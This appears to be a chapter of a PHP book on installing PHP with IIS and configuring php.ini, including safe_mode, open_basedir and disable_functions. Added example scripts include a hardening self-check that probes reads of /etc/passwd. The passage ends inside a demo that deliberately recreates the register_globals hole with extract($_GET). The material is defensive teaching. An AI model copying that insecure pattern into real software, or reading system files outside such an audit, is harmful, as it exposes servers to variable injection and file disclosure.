Installing IIS and PHP on Windows
Microsoft Windows remains the operating system of choice even among most open source–minded developers, largely due to reasons of convenience; after all, as the dominant desktop operating system, it makes sense that most would prefer to continue using this familiar environment. Yet for reasons of both stability and performance, deploying PHP-driven Web sites on Linux running an Apache Web server has historically been the best choice.
But this presents a problem if you’d like to develop and even deploy your PHP-driven Web site on a Windows server running the Microsoft IIS Web server. Microsoft, in collaboration with PHP products and services provider Zend Technologies Ltd., is seeking to eliminate this inconvenience through a new IIS component called FastCGI. FastCGI greatly improves the way IIS interacts with certain third-party applications that weren’t written with IIS in mind, including PHP (versions 5.X and newer are supported). Though FastCGI wasn’t intended for use within production environments at the time of publication, it is ready for testing and development purposes. In this section you’ll learn how to configure PHP to run in conjunction with IIS.
Installing IIS and PHP
To begin, download PHP as explained in the earlier section “Downloading PHP.” Be sure to choose the Windows zip package distribution as described in that section.
Extract the zip file to C:\php. Believe it or not, this is all that’s required in regard to installing PHP.
Next you’ll need to install IIS. In order to take advantage of FastCGI, you’ll need to install IIS version 5.1 or greater. IIS 5.1 is available for Windows 2000 Professional, Windows 2000 Server, and Windows XP Professional, whereas IIS 6 is available for Windows 2003 Server. You can verify whether IIS is installed on these operating systems by navigating to Start ➤ Run and executing inetmgr at the prompt. If the IIS manager loads, it’s installed and you can proceed to the next section, “Configuring FastCGI to Manage PHP Processes.” If it is not installed, insert the Windows XP Professional CD into your CD-ROM drive and navigate to Start ➤ Control Panel ➤ Add/Remove Programs, and select Add/Remove Windows Components. From here, check the box next to Internet Information Services (IIS) and click Next, then click OK.
Note: It’s not possible to download any version of IIS; they are bundled solely with the corresponding version of Windows, therefore you will need the Windows installation disk if IIS isn’t already installed on your computer. Also, IIS is not available nor installable on Windows 98, Windows ME, or Windows XP Home Edition.
IIS 7 is bundled with both Windows Vista and Windows Server “Longhorn”; however, it may not be installed on your machine. You can verify whether IIS is installed on these operating systems by navigating to Start ➤ Run and executing inetmgr at the prompt. If the IIS manager loads, it’s installed, and you can proceed to the next section, “Configuring FastCGI to Manage PHP Processes.” Otherwise, install IIS 7 by navigating to Start ➤ Settings ➤ Control Panel ➤ Programs and Features and clicking the Turn Windows Features On and Off link appearing to the right of the window. As shown in Figure 2-1, a new window will appear containing a list of features you’re free to enable and disable at will, including IIS. Enable IIS by clicking the checkbox next to it.
You’ll also want to enable FastCGI by clicking the checkbox next to CGI. Once both of these checkboxes have been enabled, click the OK button.
Once the installation process completes, you’ll need to restart the operating system for the changes to take effect.

Figure 2-1. Enabling IIS on Vista
Configuring FastCGI to Manage PHP Processes
Next you’ll need to configure FastCGI to handle PHP-specific requests. This is done by navigating to the IIS Manager (Start ➤ Run, then enter inetmgr), clicking Handler Mappings, clicking Add Module Mapping, and then entering the mapping as shown in Figure 2-2.
PHP and IIS are now properly installed and configured on your machine. Proceed to the next section to test your installation.

Figure 2-2. Confirming the FastCGI Handler Mapping is installed
Testing Your Installation
The best way to verify your PHP installation is by attempting to execute a PHP script.
Open a text editor and add the following lines to a new file:
<?php
phpinfo();
?>
If you’re running Apache, save the file within the htdocs directory as phpinfo.php. If you’re running IIS, save the file within C:\inetpub\wwwroot\.
Now open a browser and access this file by entering the following URL: http://localhost/phpinfo.php.
If all goes well, you should see output similar to that shown in Figure 2-3. If you’re attempting to run this script on a Web hosting provider’s server, and you receive an error message stating phpinfo() has been disabled for security reasons, you’ll need to try executing another script. Try executing this one instead, which should produce some simple output:
<?php
echo "A simple but effective PHP test!";
?>

Figure 2-3. Output from PHP’s phpinfo() function
If you encountered no noticeable errors during the build process but you are not seeing the appropriate output, it may be due to one or more of the following reasons:
• Changes made to Apache’s configuration file do not take effect until it has been restarted. Therefore, be sure to restart Apache after adding the necessary PHP-specific lines to the httpd.conf file.
• When you modify the Apache configuration file, you may accidentally introduce an invalid character, causing Apache to fail upon an attempt to restart. If Apache will not start, go back and review your changes.
• Verify that the file ends in the PHP-specific extension as specified in the httpd.conf file. For example, if you’ve defined only .php as the recognizable extension, don’t try to embed PHP code in an .html file.
• Make sure that you’ve delimited the PHP code within the file. Neglecting to do this will cause the code to output to the browser.
• You’ve created a file named index.php and are trying unsuccessfully to call it as you would a default directory index. Remember that by default, Apache only recognizes index.html in this fashion. Therefore, you need to add index.php to Apache’s DirectoryIndex directive.
• If you’re running IIS, make sure the appropriate mapping is available, as shown in Figure 2-2. If not, something went awry during the FastCGI installation process. Try removing that mapping and installing FastCGI anew.
Configuring PHP
Although the base PHP installation is sufficient for most beginning users, chances are you’ll soon want to make adjustments to the default configuration settings and possibly experiment with some of the third-party extensions that are not built into the distribution by default. In this section you’ll learn all about how to tweak PHP’s behavior and features to your specific needs.
Configuring PHP at Build Time on Linux
Building PHP as described earlier in the chapter is sufficient for getting started; however, you should keep in mind that many other build-time options are at your disposal. You can view a complete list of configuration flags (there are more than 200) by executing the following:
%>./configure --help
To make adjustments to the build process, you just need to add one or more of these arguments to PHP’s configure command, including a value assignment if necessary.
For example, suppose you want to enable PHP’s FTP functionality, a feature not enabled by default. Just modify the configuration step of the PHP build process like so:
%>./configure --with-apxs2=/usr/local/apache2/bin/apxs --enable-ftp
As another example, suppose you want to enable PHP’s Java extension. Just reconfigure PHP like so:
%>./configure --with-apxs2=/usr/local/apache2/bin/apxs \
>--enable-java=[JDK-INSTALL-DIR]
One common point of confusion among beginners is to assume that simply including additional flags will automatically make this functionality available via PHP. This is not necessarily the case. Keep in mind that you also need to install the software that is ultimately responsible for enabling the extension support. In the case of the Java example, you need the Java Development Kit (JDK).
Customizing the Windows Build
A total of 45 extensions are bundled with PHP 5.1 and 5.2, a number that was pared to 35 extensions with the current alpha version of PHP 6. However, to actually use any of these extensions, you need to uncomment the appropriate line within the php.ini file. For example, if you’d like to enable PHP’s XML-RPC extension, you need to make a few minor adjustments to your php.ini file:
1. Open the php.ini file and locate the extension_dir directive and assign it C:\php\ext\. If you installed PHP in another directory, modify this path accordingly.
2. Locate the line ;extension=php_xmlrpc.dll. Uncomment this line by removing the preceding semicolon. Save and close the file.
3. Restart the Web server and the extension is ready for use from within PHP. Keep in mind that some extensions have additional configuration directives that may be found later in the php.ini file.
When enabling these extensions, you may occasionally need to install other software. See the PHP documentation for more information about each respective extension.
Run-Time Configuration
It’s possible to change PHP’s behavior at run time on both Windows and Linux through the php.ini file. This file contains a myriad of configuration directives that collectively control the behavior of each product. The remainder of this chapter focuses on PHP’s most commonly used configuration directives, introducing the purpose, scope, and default value of each.
Managing PHP’s Configuration Directives
Before you delve into the specifics of each directive, this section demonstrates the various ways in which these directives can be manipulated, including through the php.ini file, Apache’s httpd.conf and .htaccess files, and directly through a PHP script.
The php.ini File
The PHP distribution comes with two configuration templates, php.ini-dist and php.ini-recommended. You’ll want to rename one of these files to php.ini and place it in the location specified by the PHPIniDir directive found in Apache’s httpd.conf file. It’s suggested that you use the latter because many of the parameters found within it are already assigned their suggested settings. Taking this advice will likely save you a good deal of initial time and effort securing and tweaking your installation because there are well over 200 distinct configuration parameters in this file. Although the default values go a long way toward helping you to quickly deploy PHP, you’ll probably want to make additional adjustments to PHP’s behavior, so you’ll need to learn a bit more about php.ini and its many configuration parameters. The upcoming section “PHP’s Configuration Directives” presents a comprehensive introduction to many of these parameters, explaining the purpose, scope, and range of each.
The php.ini file is PHP’s global configuration file, much like httpd.conf is to Apache. This file addresses 12 different aspects of PHP’s behavior:
• Language Options
• Safe Mode
• Syntax Highlighting
• Miscellaneous
• Resource Limits
• Error Handling and Logging
• Data Handling
• Paths and Directories
• File Uploads
• Fopen Wrappers
• Dynamic Extensions
• Module Settings
The section “PHP’s Configuration Directives” that follows will introduce many of the directives found in the php.ini file. Later chapters will introduce module-specific directives as appropriate.
Before you are introduced to them, however, take a moment to review the php.ini file’s general syntactical characteristics. The php.ini file is a simple text file, consisting solely of comments and the directives and their corresponding values. Here’s a sample snippet from the file:
;
; Allow the <? tag
;
short_open_tag = Off
Lines beginning with a semicolon are comments; the parameter short_open_tag is assigned the value Off.
Exactly when changes take effect depends on how you install PHP. If PHP is installed as a CGI binary, the php.ini file is reread every time PHP is invoked, thus making changes instantaneous. If PHP is installed as an Apache module, php.ini is only read in once, when the Apache daemon is first started. Therefore, if PHP is installed in the latter fashion, you must restart Apache before any of the changes take effect.
The Apache httpd.conf and .htaccess Files
When PHP is running as an Apache module, you can modify many of the directives through either the httpd.conf file or the .htaccess file. This is accomplished by prefixing the directive/value assignment with one of the following keywords:
• php_value: Sets the value of the specified directive.
• php_flag: Sets the value of the specified Boolean directive.
• php_admin_value: Sets the value of the specified directive. This differs from php_value in that it cannot be used within an .htaccess file and cannot be overridden within virtual hosts or .htaccess.
• php_admin_flag: Sets the value of the specified Boolean directive. This differs from php_flag in that it cannot be used within an .htaccess file and cannot be overridden within virtual hosts or .htaccess.
For example, to disable the short tags directive and prevent others from overriding it, add the following line to your httpd.conf file:
php_admin_flag short_open_tag Off
Within the Executing Script
The third, and most localized, means for manipulating PHP’s configuration variables is via the ini_set() function. For example, suppose you want to modify PHP’s maximum execution time for a given script. Just embed the following command into the top of the script:
ini_set("max_execution_time", "60");
Configuration Directive Scope
Can configuration directives be modified anywhere? The answer is no, for a variety of reasons, mostly security related. Each directive is assigned a scope, and the directive can be modified only within that scope. In total, there are four scopes:
• PHP_INI_PERDIR: Directive can be modified within the php.ini, httpd.conf, or .htaccess files
• PHP_INI_SYSTEM: Directive can be modified within the php.ini and httpd.conf files
• PHP_INI_USER: Directive can be modified within user scripts
• PHP_INI_ALL: Directive can be modified anywhere
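The scope rules can be checked from a running PHP rather than memorized: ini_set() returns the previous value for a PHP_INI_ALL directive and false for one whose scope is PHP_INI_SYSTEM or PHP_INI_PERDIR. The script below is an added example, not code from the book; the function name probeDirectiveScope is this example’s own, while the directive names are standard php.ini directives discussed in this chapter.

```php
<?php
// Added example (not from the book): report which configuration directives a
// script may change at run time. ini_set() returns the old value when the
// directive's scope is PHP_INI_ALL (or PHP_INI_USER) and false when the scope
// is PHP_INI_SYSTEM or PHP_INI_PERDIR. A directive locked with
// php_admin_value/php_admin_flag in httpd.conf also reports as locked.
function probeDirectiveScope(array $directives): array
{
    $report = [];
    foreach ($directives as $name) {
        $current = ini_get($name);
        if ($current === false) {
            $report[$name] = 'unknown directive';
            continue;
        }
        // Re-assign the value PHP already has: a harmless no-op when the
        // scope permits run-time changes, false when it does not.
        $previous = ini_set($name, (string) $current);
        $report[$name] = ($previous === false)
            ? 'locked (php.ini / httpd.conf only)'
            : 'changeable at run time';
    }
    return $report;
}

// Directives from this chapter; the scope the text gives is noted beside each.
$probe = probeDirectiveScope([
    'max_execution_time', // PHP_INI_ALL    -> changeable at run time
    'precision',          // PHP_INI_ALL    -> changeable at run time
    'memory_limit',       // PHP_INI_ALL    -> changeable at run time
    'disable_functions',  // PHP_INI_SYSTEM -> locked
    'output_buffering',   // PHP_INI_SYSTEM -> locked
    'expose_php',         // PHP_INI_SYSTEM -> locked
]);

foreach ($probe as $name => $status) {
    printf("%-20s %s\n", $name, $status);
}
```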
PHP’s Configuration Directives
The following sections introduce many of PHP’s core configuration directives. In addition to a general definition, each section includes the configuration directive’s scope and default value. Because you’ll probably spend the majority of your time working with these variables from within the php.ini file, the directives are introduced as they appear in this file.
Note that the directives introduced in this section are largely relevant solely to PHP’s general behavior; directives pertinent to extensions, or to topics to which considerable attention is given later in the book, are not introduced in this section but rather are introduced in the appropriate chapter.
Language Options
The directives located in this section determine some of the language’s most basic behavior. You’ll definitely want to take a few moments to become acquainted with these configuration possibilities.
engine = On | Off
Scope: PHP_INI_ALL; Default value: On
This parameter is responsible for determining whether the PHP engine is available. Turning it off prevents you from using PHP at all. Obviously, you should leave this enabled if you plan to use PHP.
Note: The zend.ze1_compatibility_mode directive never worked as intended and was removed in PHP 6.
short_open_tag = On | Off
Scope: PHP_INI_ALL; Default value: On
PHP script components are enclosed within escape syntax. There are four different escape formats, the shortest of which is known as short open tags, which looks like this:
<?
echo "Some PHP statement";
?>
You may recognize that this syntax is shared with XML, which could cause issues in certain environments. Thus, a means for disabling this particular format has been provided. When short_open_tag is enabled (On), short tags are allowed; when disabled (Off), they are not.
asp_tags = On | Off
Scope: PHP_INI_ALL; Default value: Off
PHP supports ASP-style script delimiters, which look like this:
<%
echo "Some PHP statement";
%>
If you’re coming from an ASP background and prefer to continue using this delimiter syntax, you can do so by enabling this tag.
precision = integer
Scope: PHP_INI_ALL; Default value: 12
PHP supports a wide variety of datatypes, including floating-point numbers. The precision parameter specifies the number of significant digits displayed in a floating-point number representation. Note that this value is set to 14 digits on Win32 systems and to 12 digits on Linux.
y2k_compliance = On | Off
Scope: PHP_INI_ALL; Default value: Off
Who can forget the Y2K scare of just a few years ago? Superhuman efforts were undertaken to eliminate the problems posed by non-Y2K-compliant software, and although it’s very unlikely, some users may be using wildly outdated, noncompliant browsers. If for some bizarre reason you’re sure that a number of your site’s users fall into this group, then disable the y2k_compliance parameter; otherwise, it should be enabled.
output_buffering = On | Off | integer
Scope: PHP_INI_SYSTEM; Default value: Off
Anybody with even minimal PHP experience is likely quite familiar with the following two messages:
These messages occur when a script attempts to modify a header after it has already been sent back to the requesting user. Most commonly they are the result of the programmer attempting to send a cookie to the user after some output has already been sent back to the browser, which is impossible to accomplish because the header (not seen by the user, but used by the browser) will always precede that output. PHP version 4.0 offered a solution to this annoying problem by introducing the concept of output buffering. When enabled, output buffering tells PHP to send all output at once, after the script has been completed. This way, any subsequent changes to the header can be made throughout the script because it hasn’t yet been sent. Enabling the output_buffering directive turns output buffering on. Alternatively, you can limit the size of the output buffer (thereby implicitly enabling output buffering) by setting it to the maximum number of bytes you’d like this buffer to contain.
If you do not plan to use output buffering, you should disable this directive because it will hinder performance slightly. Of course, the easiest solution to the header issue is simply to pass the information before any other content whenever possible.
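The header problem and the output-buffering fix, shown as an added example that is not part of the book’s text. It assumes a Web server SAPI (IIS FastCGI or Apache; the CLI sends no HTTP headers) and output_buffering = Off in php.ini, so that the script’s own ob_start() call alone decides the outcome; renderWithCookie is this example’s own name.

```php
<?php
// Added example (not from the book): a cookie set after output fails unless
// the output is buffered. Assumes a web server SAPI with
// output_buffering = Off in php.ini. renderWithCookie is this example's name.

// Emits the page body first and only afterwards tries to set a cookie.
// Returns true when the cookie could still be added to the response.
function renderWithCookie(bool $useBuffer): bool
{
    if ($useBuffer) {
        ob_start();   // per-script equivalent of output_buffering = On
    }

    echo "<html><body><p>Preparing your page...</p></body></html>\n";

    // Without a buffer, the echo above already forced the headers out, so
    // they are closed. With a buffer, nothing has left the server yet.
    $headersOpen = !headers_sent();
    if ($headersOpen) {
        // Calling setcookie() once headers are sent raises the
        // "Cannot modify header information - headers already sent" warning
        // the text describes, so it is attempted only while headers are open.
        setcookie('visited', '1', 0, '/', '', false, true);   // HttpOnly cookie
    }

    if ($useBuffer) {
        ob_end_flush();   // headers (now carrying the cookie) go first, then the body
    }
    return $headersOpen;
}

// Request the script with ?buffer=1 for the working version; omit it to see
// the failure case.
$buffered  = isset($_GET['buffer']) && $_GET['buffer'] === '1';
$cookieSet = renderWithCookie($buffered);
echo $cookieSet ? "<!-- cookie set -->\n" : "<!-- cookie skipped: headers already sent -->\n";
```

Load the script both ways and compare the Set-Cookie response header in the browser’s developer tools: it is present only for the buffered request.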
output_handler = string
Scope: PHP_INI_ALL; Default value: NULL
This interesting directive tells PHP to pass all output through a function before returning it to the requesting user. For example, suppose you want to compress all output before returning it to the browser, a feature supported by all mainstream HTTP/1.1-compliant browsers. You can assign output_handler like so:
output_handler = "ob_gzhandler"
ob_gzhandler() is PHP’s compression-handler function, located in PHP’s output control library. Keep in mind that you cannot simultaneously set output_handler to ob_gzhandler() and enable zlib.output_compression (discussed next).
zlib.output_compression = On | Off | integer
Scope: PHP_INI_SYSTEM; Default value: Off
Compressing output before it is returned to the browser can save bandwidth and time. This HTTP/1.1 feature is supported by most modern browsers and can be safely used in most applications. You enable automatic output compression by setting zlib.output_compression to On. In addition, you can simultaneously enable output compression and set a compression buffer size (in bytes) by assigning zlib.output_compression an integer value.
zlib.output_handler = string
Scope: PHP_INI_SYSTEM; Default value: NULL
The zlib.output_handler specifies a particular compression library if the zlib library is not available.
implicit_flush = On | Off
Scope: PHP_INI_SYSTEM; Default value: Off
Enabling implicit_flush results in automatically clearing, or flushing, the output buffer of its contents after each call to print() or echo(), and completing each embedded HTML block. This might be useful in an instance where the server requires an unusually long period of time to compile results or perform certain calculations. In such cases, you can use this feature to output status updates to the user rather than just wait until the server completes the procedure.
unserialize_callback_func = string
Scope: PHP_INI_ALL; Default value: NULL
This directive allows you to control the response of the unserializer when a request is made to instantiate an undefined class. For most users, this directive is irrelevant because PHP already outputs a warning in such instances if PHP’s error reporting is tuned to the appropriate level.
serialize_precision = integer
Scope: PHP_INI_ALL; Default value: 100
The serialize_precision directive determines the number of digits stored after the floating point when doubles and floats are serialized. Setting this to an appropriate value ensures that the precision is not potentially lost when the numbers are later unserialized.
allow_call_time_pass_reference = On | Off
Scope: PHP_INI_SYSTEM; Default value: On
Function arguments can be passed in two ways: by value and by reference. Exactly how each argument is passed to a function at function call time can be specified in the function definition, which is the recommended means for doing so. However, you can force all arguments to be passed by reference at function call time by enabling allow_call_time_pass_reference.
The discussion of PHP functions in Chapter 4 addresses how functional arguments can be passed both by value and by reference, and the implications of doing so.
Safe Mode
When you deploy PHP in a multiuser environment, such as that found on an ISP’s shared server, you might want to limit its functionality. As you might imagine, offering all users free rein over all PHP’s functions could open up the possibility for exploiting or damaging server resources and files. As a safeguard for using PHP on shared servers, PHP can be run in a restricted, or safe, mode.
Enabling safe mode will disable quite a few functions and various features deemed to be potentially insecure and thus possibly damaging if they are misused within a local script. A small sampling of these disabled functions and features includes parse_ini_file(), chmod(), chown(), chgrp(), exec(), system(), and backtick operators. Enabling safe mode also ensures that the owner of the executing script matches the owner of any file or directory targeted by that script. However, this latter restriction in particular can have unexpected and inconvenient effects because files can often be uploaded and otherwise generated by other user IDs.
In addition, enabling safe mode opens up the possibility for activating a number of other restrictions via other PHP configuration directives, each of which is introduced in this section.
safe_mode = On | Off
Scope: PHP_INI_SYSTEM; Default value: Off
Enabling the safe_mode directive results in PHP being run under the aforementioned constraints.
safe_mode_gid = On | Off
Scope: PHP_INI_SYSTEM; Default value: Off
When safe mode is enabled, an enabled safe_mode_gid enforces a GID (group ID) check when opening files. When safe_mode_gid is disabled, a more restrictive UID (user ID) check is enforced.
safe_mode_include_dir = string
Scope: PHP_INI_SYSTEM; Default value: NULL
The safe_mode_include_dir provides a safe haven from the UID/GID checks enforced when safe_mode and potentially safe_mode_gid are enabled. UID/GID checks are ignored when files are opened from the assigned directory.
safe_mode_exec_dir = string
Scope: PHP_INI_SYSTEM; Default value: NULL
When safe mode is enabled, the safe_mode_exec_dir parameter restricts execution of executables via the exec() function to the assigned directory. For example, if you want to restrict execution to functions found in /usr/local/bin, you use this directive:
safe_mode_exec_dir = "/usr/local/bin"
safe_mode_allowed_env_vars = string
Scope: PHP_INI_SYSTEM; Default value: PHP_
When safe mode is enabled, you can restrict which operating system–level environment variables users can modify through PHP scripts with the safe_mode_allowed_env_vars directive. For example, setting this directive as follows limits modification to only those variables with a PHP_ prefix:
safe_mode_allowed_env_vars = "PHP_"
Keep in mind that leaving this directive blank means that the user can modify any environment variable.
safe_mode_protected_env_vars = string
Scope: PHP_INI_SYSTEM; Default value: LD_LIBRARY_PATH
The safe_mode_protected_env_vars directive offers a means for explicitly preventing certain environment variables from being modified. For example, if you want to prevent the user from modifying the PATH and LD_LIBRARY_PATH variables, you use this directive:
safe_mode_protected_env_vars = "PATH, LD_LIBRARY_PATH"
open_basedir = string
Scope: PHP_INI_SYSTEM; Default value: NULL
Much like Apache’s DocumentRoot directive, PHP’s open_basedir directive can establish a base directory to which all file operations will be restricted. This prevents users from entering otherwise restricted areas of the server. For example, suppose all Web material is located within the directory /home/www. To prevent users from viewing and potentially manipulating files like /etc/passwd via a few simple PHP commands, consider setting open_basedir like this:
open_basedir = "/home/www/"
Note that the influence exercised by this directive is not dependent upon the safe_mode directive.
disable_functions = string
Scope: PHP_INI_SYSTEM; Default value: NULL
In certain environments, you may want to completely disallow the use of certain default functions, such as exec() and system(). Such functions can be disabled by assigning them to the disable_functions parameter, like this:
disable_functions = "exec, system"
Note that the influence exercised by this directive is not dependent upon the safe_mode directive.
disable_classes = string
Scope: PHP_INI_SYSTEM; Default value: NULL
Given the capabilities offered by PHP’s embrace of the object-oriented paradigm, it likely won’t be too long before you’re using large sets of class libraries. There may be certain classes found within these libraries that you’d rather not make available, however. You can prevent the use of these classes via the disable_classes directive. For example, if you want to disable two particular classes, named vector and graph, you use the following:
disable_classes = "vector, graph"
Note that the influence exercised by this directive is not dependent upon the safe_mode directive.
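Because open_basedir, disable_functions and disable_classes only take effect once the server has re-read php.ini, and a typo in any of them silently leaves the server open, the following added self-check script (not from the book) reports whether they are actually enforced by the running PHP. The function names and the choice of probe file are this example’s own; /etc/passwd is the file the text uses as the classic target outside the Web root.

```php
<?php
// Added example (not from the book): report whether the hardening directives
// open_basedir, disable_functions and disable_classes are enforced by the
// running PHP. Function names and the probe file are this example's own.

// True when $path lies inside one of the open_basedir entries. Entries are
// separated by ":" on Linux and ";" on Windows (PHP's PATH_SEPARATOR), the
// same syntax the directive uses. Plain string comparison: the probe path
// must be given in canonical form (no symbolic links or ".." segments).
function pathInsideBasedir(string $path, string $basedir): bool
{
    if ($basedir === '') {
        return true;                       // no restriction configured
    }
    $onWindows = DIRECTORY_SEPARATOR === '\\';
    foreach (explode(PATH_SEPARATOR, $basedir) as $allowed) {
        $allowed = rtrim($allowed, '/\\') . DIRECTORY_SEPARATOR;
        $cmp = $onWindows
            ? strncasecmp($path, $allowed, strlen($allowed))
            : strncmp($path, $allowed, strlen($allowed));
        if ($cmp === 0) {
            return true;
        }
    }
    return false;
}

// Splits a comma-separated directive value such as "exec, system" into names.
function directiveList(string $directive): array
{
    $names = array_map('trim', explode(',', (string) ini_get($directive)));
    return array_values(array_filter($names, 'strlen'));
}

function auditHardening(string $probeFile = ''): array
{
    // A well-known file outside any web root (assumption: it exists on the host).
    if ($probeFile === '') {
        $probeFile = DIRECTORY_SEPARATOR === '\\' ? 'C:\\Windows\\win.ini' : '/etc/passwd';
    }
    $basedir = (string) ini_get('open_basedir');

    // open_basedir: reading a file outside the base must fail. The @ only
    // hides the warning a blocked read emits; the boolean is what we report.
    $probeOutside = !pathInsideBasedir($probeFile, $basedir);
    $readBlocked  = @file_get_contents($probeFile) === false;

    // disable_functions: every listed name must be gone. function_exists()
    // returns false for a disabled function, so anything still callable means
    // a typo or a php.ini that the server has not re-read yet.
    $disabled      = directiveList('disable_functions');
    $stillCallable = array_values(array_filter($disabled, 'function_exists'));
    $shellOpen     = array_values(array_filter(
        ['exec', 'system', 'passthru', 'shell_exec'], 'function_exists'));

    return [
        'open_basedir'            => $basedir === '' ? '(unset)' : $basedir,
        'open_basedir_enforced'   => $basedir !== '' && $probeOutside && $readBlocked,
        'disabled_functions'      => $disabled,
        'disabled_but_callable'   => $stillCallable,   // should be empty
        'shell_functions_enabled' => $shellOpen,       // empty on a locked-down shared host
        'disabled_classes'        => directiveList('disable_classes'),
    ];
}

foreach (auditHardening() as $key => $value) {
    $shown = is_array($value) ? '[' . implode(', ', $value) . ']' : var_export($value, true);
    printf("%-24s %s\n", $key, $shown);
}
```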
ignore_user_abort = Off | On
Scope: PHP_INI_ALL; Default value: On
How many times have you browsed to a particular page only to exit or close the browser before the page completely loads? Often such behavior is harmless. However, what if the server is in the midst of updating important user profile information, or completing a commercial transaction? Enabling ignore_user_abort causes the server to ignore session termination caused by a user- or browser-initiated interruption.
Syntax Highlighting
PHP can display and highlight source code. You can enable this feature either by assigning the PHP script the extension .phps (this is the default extension and, as you’ll soon learn, can be modified) or via the show_source() or highlight_file() function. To use the .phps extension, you need to add the following line to httpd.conf:
AddType application/x-httpd-php-source .phps
You can control the color of strings, comments, keywords, the background, default text, and HTML components of the highlighted source through the following six directives.
Each can be assigned an RGB, hexadecimal, or keyword representation of each color. For example, the color we commonly refer to as black can be represented as rgb(0,0,0), #000000, or black, respectively.
highlight.string = string
Scope: PHP_INI_ALL; Default value: #DD0000
highlight.comment = string
Scope: PHP_INI_ALL; Default value: #FF9900
highlight.keyword = string
Scope: PHP_INI_ALL; Default value: #007700
highlight.bg = string
Scope: PHP_INI_ALL; Default value: #FFFFFF
highlight.default = string
Scope: PHP_INI_ALL; Default value: #0000BB
highlight.html = string
Scope: PHP_INI_ALL; Default value: #000000
Miscellaneous
The Miscellaneous category consists of a single directive, expose_php.
expose_php = On | Off
Scope: PHP_INI_SYSTEM; Default value: On
Each scrap of information that a potential attacker can gather about a Web server increases the chances that he will successfully compromise it. One simple way to obtain key information about server characteristics is via the server signature. For example, Apache will broadcast the following information within each response header by default:
Apache/2.2.0 (Unix) PHP/6.0.0 PHP/6.0.0-dev Server at www.example.com Port 80
Disabling expose_php prevents the Web server signature (if enabled) from broadcasting the fact that PHP is installed. Although you need to take other steps to ensure sufficient server protection, obscuring server properties such as this one is nonetheless heartily recommended.
Resource Limits
Although PHP’s resource-management capabilities were improved in version 5, you must still be careful to ensure that scripts do not monopolize server resources as a result of either programmer- or user-initiated actions. Three particular areas where such overconsumption is prevalent are script execution time, script input processing time, and memory. Each can be controlled via the following three directives.
max_execution_time = integer
Scope: PHP_INI_ALL; Default value: 30
The max_execution_time parameter places an upper limit on the amount of time, in seconds, that a PHP script can execute. Setting this parameter to 0 disables any maximum limit. Note that any time consumed by an external program executed by PHP commands, such as exec() and system(), does not count toward this limit.
max_input_time = integer
Scope: PHP_INI_ALL; Default value: 60
The max_input_time parameter places a limit on the amount of time, in seconds, that a PHP script devotes to parsing request data. This parameter is particularly important when you upload large files using PHP’s file upload feature, which is discussed in Chapter 15.
memory_limit = integerM
Scope: PHP_INI_ALL; Default value: 8M
The memory_limit parameter determines the maximum amount of memory, in megabytes, that can be allocated to a PHP script.
Data Handling
The parameters introduced in this section affect the way that PHP handles external variables, that is, variables passed into the script via some outside source. GET, POST, cookies, the operating system, and the server are all possible candidates for providing external data. Other parameters located in this section determine PHP’s default character set, PHP’s default MIME type, and whether external files will be automatically prepended or appended to PHP’s returned output.
arg_separator.output = string
Scope: PHP_INI_ALL; Default value: &
PHP is capable of automatically generating URLs and uses the standard ampersand (&) to separate input variables. However, if you need to override this convention, you can do so by using the arg_separator.output directive.
arg_separator.input = string
Scope: PHP_INI_ALL; Default value: ;&
The ampersand (&) is the standard character used to separate input variables passed in via the POST or GET methods. Although unlikely, should you need to override this convention within your PHP applications, you can do so by using the arg_separator.input directive.
variables_order = string
Scope: PHP_INI_ALL; Default value: EGPCS
The variables_order directive determines the order in which the ENVIRONMENT, GET, POST, COOKIE, and SERVER variables are parsed. While seemingly irrelevant, if register_globals is enabled (not recommended), the ordering of these values could result in unexpected results due to later variables overwriting those parsed earlier in the process.
register_globals = On | Off
Scope: PHP_INI_SYSTEM; Default value: Off
If you have used a pre-4.0 version of PHP, the mere mention of this directive is enough to evoke gnashing of teeth and pulling of hair. To eliminate the problems, this directive was disabled by default in version 4.2.0, at the cost of forcing many long-time PHP users to entirely rethink (and in some cases rewrite) their Web application development methodology. This change, although made at the cost of considerable confusion, ultimately served developers’ best interests in terms of greater application security. If you’re new to all of this, what’s the big deal?
Historically, all external variables were automatically registered in the global scope. That is, any incoming variable of the types COOKIE, ENVIRONMENT, GET, POST, and SERVER was made available globally, and because every request source could create or overwrite any global, a script could no longer tell where a value came from, and any variable the script forgot to initialize could be initialized by the client instead. Although this might seem convenient, it introduced a security deficiency: a value intended to be managed solely through a cookie could also be supplied via the URL. For example, suppose that a session identifier uniquely identifying the user is communicated across pages via a cookie. Nobody but that user should see the data that is ultimately mapped to the user identified by that session identifier. A user could open the cookie, copy the session identifier, and paste it onto the end of the URL, like this:
http://www.example.com/secretdata.php?sessionid=4x5bh5H793adK
The user could then e-mail this link to some other user. If there are no other security restrictions in place (e.g., IP identification), this second user will be able to see the otherwise confidential data. Disabling the register_globals directive prevents such behavior from occurring. While these external variables remain in the global scope, each must be referred to in conjunction with its type. For example, the sessionid variable in the previous example would instead be referred to solely as the following:
$_COOKIE['sessionid']
Any attempt to supply this value by other means (e.g., GET or POST) merely creates an entry in the array for that means ($_GET['sessionid'] or $_POST['sessionid']), which a script that reads only $_COOKIE never consults.
In Chapter 3, the section on PHP’s superglobal variables offers a thorough introduction to external variables of the COOKIE, ENVIRONMENT, GET, POST, and SERVER types. Although disabling register_globals is unequivocally a good idea, it isn’t the only factor you should keep in mind when you secure an application. Chapter 21 offers more information about PHP application security.
Note: The register_globals feature has been a constant source of confusion and security-related problems over the years. Accordingly, it was deprecated in PHP 5.3 and removed entirely in PHP 5.4.
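The following worked example, written for this page rather than taken from the book, shows the hole described above next to the form that is safe whatever the setting. It emulates a GET request from the command line (an assumption made so it runs without a web server), and check_credentials() with its single hard-coded account is a stand-in for a real credential check:

```php
<?php
declare(strict_types=1);

// Added example, not code from the book. Run with a fake query string:
//   php regglobals.php authorized=1
//   php regglobals.php user=gilmore pass=letmein

// Build $_GET from the command line so the script looks like a web request
// (assumption for the demo; a web SAPI fills $_GET itself).
if (PHP_SAPI === 'cli' && $argc > 1) {
    parse_str(implode('&', array_slice($argv, 1)), $_GET);
}

// Assumed credential check for the demo; real code compares a password hash.
function check_credentials(string $user, string $pass): bool
{
    $users = ['gilmore' => 'letmein'];
    return isset($users[$user]) && hash_equals($users[$user], $pass);
}

// What register_globals = On did before the first line of a script ran: every
// GET, POST and COOKIE key became a global variable. extract() at file scope
// reproduces that behaviour here purely to show the bug (never do this).
if (!ini_get('register_globals')) {
    extract($_GET, EXTR_SKIP);
}

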